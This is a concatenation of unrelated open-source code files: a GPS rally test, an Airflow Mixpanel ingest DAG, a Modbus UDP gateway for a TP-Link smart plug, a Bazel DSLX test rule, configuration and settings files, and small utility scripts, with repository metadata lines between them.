def rally_files():
parent_dir = Path(__file__).parent
p = parent_dir.joinpath('test_data/rallystyle/roubaix').glob('**/*')
return [x for x in p if x.is_file() and x.suffix.lower() in ['gpx', 'fit', 'tcx']]
def test_rallystyle_basic(rally_files, roubaix):
for f in rally_files:
rs = RallyResults(df = Track(gpsbabel(str(f))).df, segments = roubaix)
try:
rs.match_checkpoints()
except:
print(f.name)
raise
rs.calc_results()
if __name__ == '__main__':
unittest.main()
| 2.4375 | 2 |
airflow/kite_airflow/dags/mixpanel_ingest.py | kiteco/kiteco-public | 17 | 12760990 | import datetime
import io
import gzip
import json
import time
from airflow import DAG
from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator
from airflow.hooks.S3_hook import S3Hook
from airflow.operators.python_operator import PythonOperator
from airflow.models import Variable
import pytz
import requests
import yaml
from jinja2 import PackageLoader
import pkg_resources
from kite_airflow.slack_alerts import task_fail_slack_alert
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime.datetime(2020, 1, 1),
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': datetime.timedelta(minutes=5),
'on_failure_callback': task_fail_slack_alert,
}
dag = DAG(
'mixpanel_ingest',
default_args=default_args,
description='Mixpanel data ingest DAG.',
schedule_interval='10 4 * * *',
max_active_runs=1,
jinja_environment_kwargs={
'loader': PackageLoader('kite_airflow', 'templates')
},
)
pacific = pytz.timezone('America/Los_Angeles')
people_schema = yaml.load(pkg_resources.resource_stream('kite_airflow', 'files/mixpanel_people.schema.yaml'), Loader=yaml.FullLoader)
def copy_profile_deltas(task_instance, execution_date, prev_execution_date_success, next_execution_date, **context):
ex_day = execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
if prev_execution_date_success:
ex_day = prev_execution_date_success.replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=1)
next_ex_day = next_execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
chunks = [ex_day]
while chunks[-1] < next_ex_day:
chunks.append(chunks[-1] + datetime.timedelta(hours=4))
gz_file = io.BytesIO()
with gzip.GzipFile(fileobj=gz_file, mode="w") as f:
start_date = chunks.pop(0)
for chunk in chunks:
filters = []
for cmp, dt in [['>=', start_date], ['<', chunk]]:
filters.append('user.time {} {}'.format(cmp, 1000 * int(time.mktime(dt.astimezone(pacific).timetuple()))))
start_date = chunk
print(filters)
script = 'function main() {{ return People().filter(function(user) {{ return {}; }})}}'.format(' && '.join(filters))
res = requests.post('https://mixpanel.com/api/2.0/jql',
auth=(Variable.get('mixpanel_credentials', deserialize_json=True)['secret'], ''),
data={'script': script})
if res.status_code != 200:
raise Exception(res.text)
for line in res.json():
to_scrub = [line]
while to_scrub:
curr = to_scrub.pop(0)
for key, value in list(curr.items()):
if isinstance(value, (dict, list)) and len(value) == 0:
del curr[key]
if isinstance(value, dict):
to_scrub.append(value)
if key.startswith('$'):
curr[key[1:]] = value
del curr[key]
for ts_field in ['last_seen', 'time']:
pacific_ts = datetime.datetime.fromtimestamp(line[ts_field] / 1000).replace(tzinfo=pacific)
line[ts_field] = int(time.mktime(pacific_ts.astimezone(pytz.utc).timetuple()))
f.write(json.dumps(line).encode('utf8'))
f.write(b'\n')
s3 = S3Hook('aws_us_east_1')
key = 'mixpanel/people/raw/year={}/month={}/day={}/deltas.json.gz'.format(
execution_date.year, execution_date.month, execution_date.day
)
s3.load_bytes(gz_file.getvalue(), key, 'kite-metrics')
PythonOperator(
python_callable=copy_profile_deltas,
task_id=copy_profile_deltas.__name__,
dag=dag,
retries=2,
provide_context=True,
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='rollup_people',
query='athena/queries/mixpanel_people_rollup.tmpl.sql',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='cleanup_rollup_table',
query="DROP TABLE mixpanel_people_rollup_{{ds_nodash}}",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='update_people_table_location',
query="""ALTER TABLE mixpanel_people
SET LOCATION 's3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/'""",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
)
ddl_dag = DAG(
'mixpanel_ingest_schema_update',
default_args=default_args,
description='Mixpanel data schema definition.',
schedule_interval=None,
max_active_runs=1,
)
for table_name, s3_prefix in {'mixpanel_people_raw': 'mixpanel/people/raw', 'mixpanel_people': 'mixpanel/people/rollups'}.items():
AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='drop_{}'.format(table_name),
query='DROP TABLE {{params.table_name}}',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=ddl_dag,
params={'table_name': table_name},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='create_{}'.format(table_name),
query='athena/tables/mixpanel_people.tmpl.sql',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=ddl_dag,
params={
'schema': people_schema,
'table_name': table_name,
's3_prefix': s3_prefix,
'partitioned': table_name == 'mixpanel_people_raw',
'json': table_name == 'mixpanel_people_raw',
}
)
| 1.8125 | 2 |
modbusgwudp.py | andycranston/hs100110-modbusgw | 0 | 12760991 | #! /usr/bin/python3
#
# @(!--#) @(#) modbusgwudp.py, version 003, 02-july-2018
#
# modbus gateway over UDP for a TP-Link HS100/HS110 Smart WiFi Plug
#
# Links
#
# https://www.softscheck.com/en/reverse-engineering-tp-link-hs110/
# https://github.com/softScheck/tplink-smartplug
# https://github.com/softScheck/tplink-smartplug/blob/master/tplink-smartplug.py
# https://unserver.xyz/modbus-guide/
#
#
# imports
#
import sys
import os
import argparse
import socket
########################################################################
DEFAULT_MODBUS_PORT = "8502"
MAX_PACKET_LENGTH = 1024
GETSYSINFO = '{"system":{"get_sysinfo":{}}}'
SETRELAYON = '{"system":{"set_relay_state":{"state":1}}}'
SETRELAYOFF = '{"system":{"set_relay_state":{"state":0}}}'
########################################################################
def showpacket(bytes):
bpr = 16 # bpr is Bytes Per Row
numbytes = len(bytes)
if numbytes == 0:
print("<empty frame>")
else:
i = 0
while i < numbytes:
if (i % bpr) == 0:
print("{:04d} :".format(i), sep='', end='')
print(" {:02X}".format(bytes[i]), sep='', end='')
if ((i + 1) % bpr) == 0:
print()
i = i + 1
if (numbytes % bpr) != 0:
print()
return
########################################################################
def encrypt(barray):
key = 171
result = bytearray(len(barray) + 4)
i = 4
for b in barray:
a = key ^ b
key = a
result[i] = a
i += 1
return result
########################################################################
def decrypt(barray):
key = 171
result = bytearray(len(barray))
i = 0
for b in barray:
a = key ^ b
key = b
result[i] = a
i += 1
return result
########################################################################
def runplugcommand(ipaddr, command):
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.connect((ipaddr, 9999))
tcp.send(encrypt(bytearray(command, 'utf-8')))
plugdata = tcp.recv(MAX_PACKET_LENGTH)
tcp.close()
return(decrypt(plugdata[4:]))
########################################################################
def getrelaystatus(ipaddr):
sysinfo = runplugcommand(ipaddr, '{"system":{"get_sysinfo":{}}}')
if bytearray('","relay_state":0,', 'utf-8') in sysinfo:
return 0
elif bytearray('","relay_state":1,', 'utf-8') in sysinfo:
return 1
else:
return None
########################################################################
def setrelaystatus(ipaddr, status):
if status == 0:
cmd = SETRELAYOFF
else:
cmd = SETRELAYON
errcode = runplugcommand(ipaddr, cmd)
########################################################################
#
# Main
#
progname = os.path.basename(sys.argv[0])
parser = argparse.ArgumentParser()
parser.add_argument("--ipaddr", help="IP address of the HS100/HS110 plug")
parser.add_argument("--port", help="port number to listen on", default=DEFAULT_MODBUS_PORT)
args = parser.parse_args()
ipaddr = args.ipaddr
port = int(args.port)
print("====== {} === HS100/110 IP address: {} === Modbus Port: {} ======".format(progname, ipaddr, port))
udp = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
udp.bind(('', port))
while True:
print("Waiting to receive incoming Modbus packet over UDP")
try:
databytes, clientaddress = udp.recvfrom(MAX_PACKET_LENGTH)
except ConnectionResetError:
print("{}: got a ConnectionResetError - ignoring".format(progname), file=sys.stderr)
continue
if len(databytes) < 6:
print("{}: runt Modbus UDP packet received - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
packetlength = (databytes[4] * 256) + databytes[5]
if (packetlength < 2):
print("{}: Modbus UDP packet length too short to have any useful data in it - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
if (packetlength + 6) != len(databytes):
print("{}: Modbus UDP packet has incorrect length - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
unitid = databytes[6]
if unitid != 1:
print("{}: this gateway only serves Modbus UDP packets with Unit ID of 1 - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
functioncode = databytes[7]
if functioncode == 1:
# read coil
print("Function code 0x01 - read single coil")
showpacket(databytes)
if packetlength != 6:
print("{}: incorrect packet length for function code 0x01 - ignoring".format(progname), file=sys.stderr)
continue
addr = (databytes[8] * 256) + databytes[9]
if (addr != 0):
print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
continue
numr = (databytes[10] * 256) + databytes[11]
if (numr != 1):
print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
continue
relay = getrelaystatus(ipaddr)
response = bytearray(6 + 4)
response[0:3] = databytes[0:3]
response[4] = 0
response[5] = 4
response[6] = 1
response[7] = 1
response[8] = 1
response[9] = relay
print("Sending response:")
showpacket(response)
udp.sendto(response, clientaddress)
continue
if functioncode == 5:
# write coil
print("Function code 0x05 - write single coil")
showpacket(databytes)
if packetlength != 6:
print("{}: incorrect packet length for function code 0x06 - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
addr = (databytes[8] * 256) + databytes[9]
if (addr != 0):
print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
continue
stat = (databytes[10] * 256) + databytes[11]
if ((stat != 0) and (stat != 0xFF00)):
print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
continue
setrelaystatus(ipaddr, stat)
response = bytearray(len(databytes))
response[0:12] = databytes[0:12]
print("Sending response:")
showpacket(response)
udp.sendto(response, clientaddress)
continue
print("{}: unrecognised or unsupported packet".format(progname), file=sys.stderr)
showpacket(databytes)
########################################################################
# end of file
| 2.140625 | 2 |
xls/build_rules/dslx_test.bzl | ufo2011/xls | 0 | 12760992 | <reponame>ufo2011/xls
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""See dslx_test()."""
load("//xls/build_rules:genrule_wrapper.bzl", "genrule_wrapper")
load("//xls/build_rules:dslx_codegen.bzl", "make_benchmark_args")
_INTERPRETER_MAIN = "//xls/dslx:interpreter_main"
_DSLX_TEST = "//xls/dslx/interpreter:dslx_test"
# TODO(meheff): Move this to a different internal-only bzl file.
def _convert_ir(
name,
src,
entry,
srcs,
deps,
tags,
args,
prove_unopt_eq_opt,
generate_benchmark,
kwargs):
native.sh_test(
name = name + "_ir_converter_test",
srcs = ["//xls/dslx:ir_converter_test_sh"],
args = [native.package_name() + "/" + src] + args,
data = [
"//xls/dslx:ir_converter_main",
] + srcs + deps,
tags = tags,
)
genrule_wrapper(
name = name + "_ir",
srcs = srcs + deps,
outs = [name + ".ir"],
cmd = "$(location //xls/dslx:ir_converter_main) --dslx_path=$(GENDIR) $(SRCS) > $@",
exec_tools = ["//xls/dslx:ir_converter_main"],
tags = tags,
**kwargs
)
genrule_wrapper(
name = name + "_opt_ir",
srcs = srcs + deps,
outs = [name + ".opt.ir"],
cmd = ("$(location //xls/dslx:ir_converter_main) --dslx_path=$(GENDIR) $(SRCS) " +
" | $(location //xls/tools:opt_main) --entry=%s - " +
" > $@") % (entry or ""),
exec_tools = [
"//xls/dslx:ir_converter_main",
"//xls/tools:opt_main",
],
tags = tags,
**kwargs
)
native.filegroup(
name = name + "_all_ir",
srcs = [name + ".opt.ir", name + ".ir"],
)
if prove_unopt_eq_opt:
native.sh_test(
name = name + "_opt_equivalence_test",
srcs = ["//xls/tools:check_ir_equivalence_sh"],
args = [
native.package_name() + "/" + name + ".ir",
native.package_name() + "/" + name + ".opt.ir",
] + (["--function=" + entry] if entry else []),
size = "large",
data = [
":" + name + "_all_ir",
"//xls/tools:check_ir_equivalence_main",
],
tags = tags + ["optonly"],
)
if generate_benchmark:
benchmark_args = make_benchmark_args(
native.package_name(),
name,
entry,
args,
)
# Add test which executes benchmark_main on the IR.
native.sh_test(
name = name + "_benchmark_test",
srcs = ["//xls/tools:benchmark_test_sh"],
args = benchmark_args,
data = [
"//xls/tools:benchmark_main",
":" + name + "_all_ir",
],
tags = tags,
)
# Add test which evaluates the IR with the interpreter and verifies
# the result before and after optimizations match.
native.sh_test(
name = name + "_benchmark_eval_test",
srcs = ["//xls/tools:benchmark_eval_test_sh"],
args = benchmark_args + ["--random_inputs=100", "--optimize_ir"],
data = [
"//xls/tools:eval_ir_main",
":" + name + "_all_ir",
],
tags = tags + ["optonly"],
)
# TODO(meheff): dslx_test includes a bunch of XLS internal specific stuff such
# as generating benchmarks and convert IR. These should be factored out so we
# have a clean macro for end-user use.
def dslx_test(
name,
srcs,
deps = None,
entry = None,
args = None,
convert_ir = True,
compare = "jit",
prove_unopt_eq_opt = True,
generate_benchmark = True,
tags = [],
**kwargs):
"""Runs all test cases inside of a DSLX source file as a test target.
Args:
name: 'Base' name for the targets that get created.
srcs: '.x' file sources.
deps: Dependent '.x' file sources.
entry: Name (currently *mangled* name) of the entry point that should be
converted / code generated.
args: Additional arguments to pass to the DSLX interpreter and IR
converter.
convert_ir: Whether or not to convert the DSLX code to IR.
compare: Perform a runtime equivalence check between the DSLX interpreter
and the IR JIT ('jit') or IR interpreter ('interpreter') or no IR
conversion / comparison at all ('none').
generate_benchmark: Whether or not to create a benchmark target (that
analyses XLS scheduled critical path).
prove_unopt_eq_opt: Whether or not to generate a test to compare semantics
of opt vs. non-opt IR. Only enabled if convert_ir is true.
tags: Tags to place on all generated targets.
**kwargs: Extra arguments to pass to genrule.
"""
args = args or []
deps = deps or []
if len(srcs) != 1:
fail("More than one source not currently supported.")
if entry and not type(entry) != str:
fail("Entry argument must be a string.")
src = srcs[0]
interpreter_args = ["--compare={}".format(compare if convert_ir else "none")]
native.sh_test(
name = name + "_dslx_test",
srcs = [_DSLX_TEST],
args = [native.package_name() + "/" + src] + args + interpreter_args,
data = [
_INTERPRETER_MAIN,
] + srcs + deps,
tags = tags,
)
if convert_ir:
_convert_ir(
name,
src,
entry,
srcs,
deps,
tags,
args,
prove_unopt_eq_opt,
generate_benchmark,
kwargs,
)
native.filegroup(
name = name + "_source",
srcs = srcs,
)
native.test_suite(
name = name,
tests = [name + "_dslx_test"],
tags = tags,
)
| 1.679688 | 2 |
openslides/utils/auth/__init__.py | DebVortex/OpenSlides | 0 | 12760993 | <reponame>DebVortex/OpenSlides<gh_stars>0
from .AnonymousAuth import * # noqa
| 1.039063 | 1 |
common/config.py | weng-lab/SCREEN | 5 | 12760994 | #!/usr/bin/env python3
# SPDX-License-Identifier: MIT
# Copyright (c) 2016-2020 <NAME>, <NAME>, <NAME>, <NAME>
import sys
import os
import json
class Config:
fnp = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../config.json")
if not os.path.exists(fnp):
print("ERROR: file not found:", fnp)
print("\tfile should be symlink'd to a desired config.<blah>.json file")
sys.exit(1)
with open(fnp) as f:
c = json.load(f)
re = c["RE"]
partial_assemblies = re["partial_assemblies"] if "partial_assemblies" in re else []
version = re["version"]
db_host = re["db_host"]
db_usr = re["db_usr"]
db_port = re["db_port"]
db = re["db"]
assemblies = re["assemblies"]
minipeaks_ver = re["minipeaks_ver"]
minipeaks_nbins = re["minipeaks_nbins"]
ribbon = re["ribbon"]
GoogleAnalytics = re["googleAnalytics"]
memcache = re["memcache"]
cassandra = re["cassandra"]
redisHost = re["redisHost"]
bedupload = c["bedupload"]
downloadDir = re["downloadDir"]
rnaSeqIsNorm = re["rnaSeqIsNorm"]
#peakIntersectionRunDate = re["peakIntersectionRunDate"]
#cistromePeakIntersectionRunDate = re["cistromePeakIntersectionRunDate"]
| 2.125 | 2 |
settings/detector_configuration_settings.py | bopopescu/Lauecollect | 0 | 12760995 | show_in_list = True
title = 'Detector Configuration'
motor_names = ['collect.detector_configuration', 'xray_scope.setup', 'laser_scope.setup']
names = ['detectors', 'xray_scope_setup', 'laser_scope_setup', 'motor2']
motor_labels = ['Detectors', 'X-ray Scope Setup', 'Laser Scope Setup']
widths = [280, 170, 170]
line0.xray_scope.setup = 'NIH SAXS-WAXS'
line0.laser_scope.setup = 'NIH SAXS-WAXS'
line0.updated = '2019-05-28 20:24:36'
line1.xray_scope.setup = 'NIH FPGA diagnostics'
line1.laser_scope.setup = 'FPGA diagnostics'
line1.updated = '2019-01-28 18:17:10'
line0.description = 'SAXS/WAXS'
line1.description = 'FPGA diagnostics'
command_rows = [0]
line0.detectors = 'xray_detector, xray_scope, laser_scope'
line0.collect.detector_configuration = 'xray_detector, xray_scope, laser_scope'
nrows = 9
line2.description = 'SAXS/WAXS static'
line2.collect.detector_configuration = 'xray_detector, xray_scope'
line2.xray_scope.setup = 'NIH SAXS-WAXS'
line2.laser_scope.setup = ''
line2.updated = '2019-05-28 19:49:55'
line3.description = 'NIH:Channel-Cut-Scan'
line3.collect.detector_configuration = 'xray_scope'
line3.updated = '2019-01-28 18:16:58'
line3.xray_scope.setup = 'NIH Channel Cut Scan'
line4.description = 'NIH:Slit-Scan'
line4.collect.detector_configuration = 'xray_scope'
line4.updated = '2019-03-18 17:06:12'
line4.xray_scope.setup = 'NIH Slit Scan'
line5.description = 'X-Ray Alignment'
line5.collect.detector_configuration = ''
line5.updated = '2019-01-29 08:48:16'
line5.xray_scope.setup = 'Alignment'
line5.laser_scope.setup = ''
row_height = 20
line6.xray_scope.setup = 'APS Channel Cut Scan'
line6.updated = '2019-01-29 17:04:44'
line6.description = 'APS:Channel-Cut-Scan'
description_width = 180
line7.description = 'NIH:X-Ray Beam Check'
line7.collect.detector_configuration = 'xray_scope'
line7.updated = '2019-01-29 22:55:00'
line7.xray_scope.setup = 'NIH X-Ray Beam Check'
line8.collect.detector_configuration = 'xray_detector'
line8.updated = '2019-02-04 11:50:52'
line8.xray_scope.setup = '<NAME>'
line8.laser_scope.setup = ''
line8.description = '<NAME>' | 1.101563 | 1 |
examples/matrix_blink.py | sonntagsgesicht/flotilla-python | 22 | 12760996 | <reponame>sonntagsgesicht/flotilla-python
#!/usr/bin/env python
import sys
import time
import flotilla
print("""
This example will iterate through all connected Flotilla modules,
find each Matrix, and blink one of the pixels.
Press CTRL+C to exit.
""")
# Looks for the dock, and all of the modules we need
# attached to the dock so we can talk to them.
dock = flotilla.Client()
print("Client connected...")
while not dock.ready:
pass
print("Finding modules...")
matrix = dock.first(flotilla.Matrix)
if matrix is None:
print("no Matrix module found...")
dock.stop()
sys.exit(1)
else:
print("Found. Running...")
state = True
try:
while True:
for module in dock.available.values():
if module.is_a(flotilla.Matrix):
module.set_pixel(3, 3, state).update()
state = not state
time.sleep(1)
except KeyboardInterrupt:
print("Stopping Flotilla...")
dock.stop()
| 3.203125 | 3 |
tools/process-wasm-compilation-times.py | EXHades/v8 | 20,995 | 12760997 | <filename>tools/process-wasm-compilation-times.py<gh_stars>1000+
#!/usr/bin/env python3
# Copyright 2021 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Processes {stdout} output generated by --trace-wasm-compilation-times
# for easier consumption by human readers.
import sys
def SizeInternal(number, suffix):
if suffix == "": return "%d" % number
if number < 10: return "%.1f%s" % (number, suffix)
return "%d%s" % (number, suffix)
def Size(number):
if (number < 1024): return SizeInternal(number, "")
number /= 1024
if (number < 1024): return SizeInternal(number, "K")
number /= 1024
if (number < 1024): return SizeInternal(number, "M")
number /= 1024
if (number < 1024): return SizeInternal(number, "G")
return SizeInternal(number / 1024, "T")
modules = {}
max_module = 0
total_tf_time = 0
total_tf_size = 0
def RegisterName(raw):
global max_module
parts = raw.split("#")
m = parts[0]
if m not in modules:
modules[m] = max_module
max_module += 1
def Name(raw):
parts = raw.split("#")
if len(modules) == 1: return "#%s" % parts[1]
return "m%d#%s" % (modules[parts[0]], parts[1])
class Function:
def __init__(self, index):
self.index = index
self.has_lo = False
self.has_tf = False
self.time_lo = -1
self.time_tf = -1
self.mem_lo = -1
self.mem_tf_max = -1
self.mem_tf_total = -1
self.name = ""
self.size_wasm = -1
self.size_lo = -1
self.size_tf = -1
def AddLine(self, words):
assert self.index == words[2], "wrong function"
if words[4] == "TurboFan,":
self.AddTFLine(words)
elif words[4] == "Liftoff,":
self.AddLiftoffLine(words)
else:
raise Exception("unknown compiler: %s" % words[4])
def AddTFLine(self, words):
assert not self.has_tf, "duplicate TF line for %s" % self.index
self.has_tf = True
# 0 1 2 3 4 5 6 7 8 9 10 11
# Compiled function #6 using TurboFan, took 0 ms and 14440 / 44656
# 12 13 14 15 16 17
# max/total bytes, codesize 24 name wasm-function#6
self.time_tf = int(words[6])
self.mem_tf_max = int(words[9])
self.mem_tf_total = int(words[11])
self.size_tf = int(words[15])
self.name = words[17]
def AddLiftoffLine(self, words):
assert self.index == words[2], "wrong function"
assert not self.has_lo, "duplicate Liftoff line for %s" % self.index
self.has_lo = True
# 0 1 2 3 4 5 6 7 8 9 10 11 12
# Compiled function #6 using Liftoff, took 0 ms and 968 bytes; bodysize 4
# 13 14
# codesize 68
self.time_lo = int(words[6])
self.mem_lo = int(words[9])
self.size_lo = int(words[14])
self.size_wasm = int(words[12])
def __str__(self):
return "%s: time %d %d mem %s %s %s size %s %s %s name %s" % (
Name(self.index), self.time_lo, self.time_tf,
Size(self.mem_lo), Size(self.mem_tf_max), Size(self.mem_tf_total),
Size(self.size_wasm), Size(self.size_lo), Size(self.size_tf), self.name
)
funcs_dict = {}
funcs_list = []
if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help", "help"):
print("Pass output file (generated with --trace-wasm-compilation-times) as "
"argument")
sys.exit(1)
with open(sys.argv[1], "r") as f:
for line in f.readlines():
words = line.strip().split(" ")
if words[0] != "Compiled": continue
name = words[2]
RegisterName(name)
if name in funcs_dict:
func = funcs_dict[name]
else:
func = Function(name)
funcs_dict[name] = func
funcs_list.append(func)
func.AddLine(words)
funcs_list.sort(key=lambda fun: fun.time_tf)
for f in funcs_list:
print(f)
total_tf_time += f.time_tf
total_tf_size += f.size_tf
print("Total TF time: %d" % total_tf_time)
print("Total TF size: %d" % total_tf_size)
| 2.109375 | 2 |
vmps/mpo.py | Lynn-015/Test_01 | 2 | 12760998 | <gh_stars>1-10
import numpy as np
from copy import deepcopy
from mps import MPS
class MPO(object):
def __init__(self,d,L,Ws=[]):
self.Ws=Ws
self.d=d
self.D=self.d**2
self.L=L
def compress(self,m): #remain m largest value
o=np.array([[[1.]]])
for l in range(self.L):
self.Ws[l]=np.tensordot(o,self.Ws[l],1)
self.Ws[l].reshape(-1,self.Ws[l][-1]) #blockize
U,S,Vdag=np.svd(self.Ws[l],full_matrices=False)
W=U.reshape(-1,self.d,self.d,U.shape[-1])
S.sort()
S=S[:m] #renormalize?
o=np.tensordot(np.diag(S),Vdag,1)
def op2mpo(op,d,L): #opstring to mpo,opsting is an array
o=deepcopy(op)
D=d**2
a=1;Ws=[]
for i in range(L):
O=o.reshape((a,d,d**(L-i-1),d,d**(L-i-1)))
O.transpose((0,1,3,2,4)).reshape(-1,d**(2*(L-i-1)))
#blockize? seems not
U,S,Vdag=np.linalg.svd(O,full_matrices=False)
W=U.reshape(-1,d,d,U.shape[-1]) #blockize seem no need since add and compress
Ws.append(W)
o=np.tensordot(np.diag(S),Vdag,1)
a=S.shape[0]
Ws[-1]*=float(o)
return MPO(d,L,Ws)
def add(mpo1,mpo2):
Ws=[]
for l in range(mpo1.L):
for i in range(mpo1.d):
for j in range(mpo1.d):
if l==0:
W[:,i,j,:]=np.hstack(mpo1.Ws[l][:,i,j,:],mpo2.Ws[l][:,i,j,:])
elif l==mpo1.L-1:
W[:,i,j,:]=np.vstack(mpo1.Ws[l][:,i,j,:],mpo2.Ws[l][:,i,j,:])
else:
W[:,i,j,:]=block_diag(mpo1.Ws[l][:,i,j,:],mpo2.Ws[l][:,i,j,:])
Ws.append(W)
mpo=MPO(mpo1.d,mpo1.L,Ws)
return mpo
'''
def act(mpo,mps):
Ns=[]
tmps=deepcopy(mps) #target mps
tmps.contract_s() #contract S to A or B
for i in range(mpo.L):
N=contract(mpo.Ws[i],tmps.Ms[i],axes=([2,],[1,])) #details later
N.transpose((0,3,1,2)).reshape(N.shape[0]*N.shape[1],mpo.d,-1)
Ns.append(N)
rmps.Ms=Ns #result mps
return rmps
'''
| 2 | 2 |
code/Solutions TP2/racine.py | christophesaintjean/IntroProgS1_2020 | 0 | 12760999 | <filename>code/Solutions TP2/racine.py
import math
x = float(input("x ? "))
if x >= 0:
rac_x = math.sqrt(x)
print(f"La racine carrée de {x} est {rac_x}")
else:
print(f"Impossible de calculer la racine carrée de {x} qui est négatif") | 3.875 | 4 |
caql/gaussian_noise_policy.py | xxdreck/google-research | 2 | 12761000 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gaussian noise policy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from caql import policy
class GaussianNoisePolicy(policy.BasePolicy):
"""Implementation for gaussian noise policy."""
def __init__(self, greedy_policy, sigma, sigma_decay, sigma_min):
"""Creates an epsilon greedy policy.
Args:
greedy_policy: policy.BasePolicy. The policy that is used to compute a
greedy action.
sigma: float. Standard deviation for a gaussian distribution.
sigma_decay: float. Decay rate for the sigma.
sigma_min: float. The minimum value of the sigma.
"""
if not 0 <= sigma <= 1.0:
raise ValueError('sigma should be in [0.0, 1.0]')
self._greedy_policy = greedy_policy
self._sigma = sigma
self._sigma_decay = sigma_decay
self._sigma_min = sigma_min
@property
def sigma(self):
return self._sigma
def _action(self, state, use_action_function, batch_mode=False):
mean_action = self._greedy_policy.action(state, use_action_function,
batch_mode)
if mean_action is None:
return None
batch_action_dim = np.shape(mean_action)
# Match the scale of noise value to action value.
noise_exploration = (
self._sigma * self._greedy_policy.action_spec.maximum *
np.random.randn(*batch_action_dim))
return mean_action + noise_exploration
def _update_params(self):
self._sigma = max(self._sigma * self._sigma_decay, self._sigma_min)
def _params_debug_str(self):
return 'sigma: %.3f' % self._sigma
| 2.734375 | 3 |
Blueberry.Server.Python/Main.py | ppedro74/BlueberryServer | 0 | 12761001 | <gh_stars>0
"""
Copyright (c) 2019 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
import sys
import time
import socket
import logging
import argparse
import Controller
import DigitalController
import PWMController
import ServoController
import SerialPortController
import ComponentRegistry
import EZBTcpServer
import EZBCameraServer
def setup_i2c():
if sys.platform == "linux" or sys.platform == "linux2":
import DeviceI2CController
com = DeviceI2CController.DeviceI2CController(1, logging.DEBUG)
else:
import FakeI2CController
com = FakeI2CController.FakeI2CController(logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_component("i2c", com)
ComponentRegistry.ComponentRegistry.register_controller(com)
com.start()
return com
def setup_digital_ports():
if sys.platform == "linux" or sys.platform == "linux2":
import RpiGPIODigitalController
com = RpiGPIODigitalController.RpiGPIODigitalController(logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_controller(com)
#+-----+---------+--B Plus--+-----------+-----+
#| BCM | Name | Physical | Name | BCM |
#+-----+---------+----++----+-----------+-----+
#| | 3.3v | 1 || 2 | 5v | |
#| 2 | SDA.1 | 3 || 4 | 5v | |
#| 3 | SCL.1 | 5 || 6 | GND | |
